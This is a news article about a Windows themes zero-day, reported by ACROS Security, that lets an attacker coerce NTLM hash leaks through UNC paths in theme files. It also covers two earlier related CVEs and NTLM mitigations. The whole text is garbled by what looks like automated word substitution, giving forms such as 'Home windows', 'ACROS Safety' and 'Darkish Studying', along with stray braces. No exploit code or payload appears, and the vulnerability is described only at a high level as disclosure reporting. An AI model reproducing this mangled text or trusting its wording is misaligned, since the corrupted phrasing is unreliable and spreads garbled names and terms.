All variations of Home windows purchasers, from Home windows 7 by way of present Home windows 11 variations, include a 0-day vulnerability that would enable attackers to seize NTLM authentication hashes from customers of affected methods.
Researchers at ACROS Safety reported the flaw to Microsoft this week. They found the problem whereas writing a patch for older Home windows methods for CVE-2024-38030, a medium-severity Home windows Themes spoofing vulnerability that Microsoft mitigated in its July safety replace.
Variant of Two Earlier Vulnerabilities
The vulnerability that ACROS found is similar to CVE-2024-38030 and permits what is called an authentication coercion assault, the place a weak gadget is basically coerced into sending NTLM hashes — the cryptographic illustration of a consumer’s password — to an attacker’s system. Akamai researcher Tomer Peled found CVE-2024-38030 whereas analyzing Microsoft’s repair for CVE-2024-21320, one other, earlier Home windows themes spoofing vulnerability he found and reported to Microsoft. The flaw that ACROS uncovered is a brand new, separate vulnerability associated to the 2 flaws Peled reported earlier.
Home windows themes recordsdata enable customers to customise the looks of their Home windows desktop interface through wallpapers, display screen savers, colours, and sounds. Each the vulnerabilities that Akamai researcher Peled found needed to do with the style wherein the themes dealt with file paths to a few picture assets, particularly “BrandImage” or “Wallpaper.” Peled discovered that due to improper validation, an attacker may manipulate the respectable path to those assets in such a method as to get Home windows to robotically ship an authenticated request, together with the consumer’s NTLM hash, to the attacker’s gadget.
As Peled explains to Darkish Studying, “The themes file format is an .ini file, with a number of ‘key,worth’ pairs. I initially discovered two key,worth pairs that would settle for file paths,” he says.
The unique vulnerability (CVE-2024-21320) stemmed from the truth that the important thing,worth pairs accepted UNC paths — a standardized format for figuring out community assets like shared recordsdata and folders — for community drives, Peled notes. “This [meant] {that a} weaponized theme file, with a UNC path, may set off an outbound reference to consumer authentication, with out them figuring out.” Microsoft mounted the problem by including a verify on the file path to make sure it wasn’t a UNC path. However, Peled says, the perform Microsoft used for this validation allowed for some bypasses, which is what led to Peled’s discovery of the second vulnerability (CVE-2024-38030).
Microsoft Will Act ‘As Wanted’
What ACROS Safety reported this week is the third Home windows themes spoofing vulnerability rooted in the identical file path challenge. “Our researchers found the vulnerability in early October whereas writing a patch for CVE-2024-38030 meant for legacy Home windows methods lots of our customers are nonetheless utilizing,” says Mitja Kolsek, CEO of ACROS Safety. “We reported this challenge to Microsoft [on] Oct. 28, 2024, however we didn’t launch particulars or a proof-of-concept, which we plan to do after Microsoft has made their very own patch publicly out there.”
A Microsoft spokesman mentioned through electronic mail the corporate is conscious of the ACROS report and “will take motion as wanted to assist preserve prospects protected.” The corporate doesn’t seem to have issued a CVE, or vulnerability identifier, for the brand new challenge but.
Like the 2 earlier Home windows themes spoofing vulnerabilities that Akamai found, the brand new one which ACROS discovered additionally doesn’t require an attacker to have any particular privileges. “However they should by some means get the consumer to repeat a theme file to another folder on their laptop, then open that folder with Home windows Explorer utilizing a view that renders icons,” Kolsek says. “The file is also robotically downloaded to their Downloads folder whereas visiting [an] attacker’s web site, wherein case the attacker must anticipate the consumer to view the Downloads folder at a later time.”
Kolsek recommends that organizations disable NTLM the place potential, however acknowledges that doing so may trigger practical issues if any community parts depend on it. “[An] attacker may solely efficiently goal a pc the place NTLM is enabled,” he says. “One other requirement is {that a} request initiated by a malicious theme file would be capable of attain the attacker’s server on the Web or in an adjoining community,” one thing that firewalls ought to usually block, he says. Because of this, it is extra probably than an attacker would attempt to exploit the flaw in a focused marketing campaign extra so than in a mass exploit.
Akamai’s Peled says it is laborious to know what ACROS’s vulnerability is about with out getting access to the technical particulars. “But it surely is likely to be one other UNC bypass that circumvents the verify, or it may very well be a unique key,worth pair that was missed within the unique patching,” he says. “UNC path codecs are very advanced and permit for bizarre mixtures, which make detecting them very laborious. This is likely to be why it is so advanced to repair.”
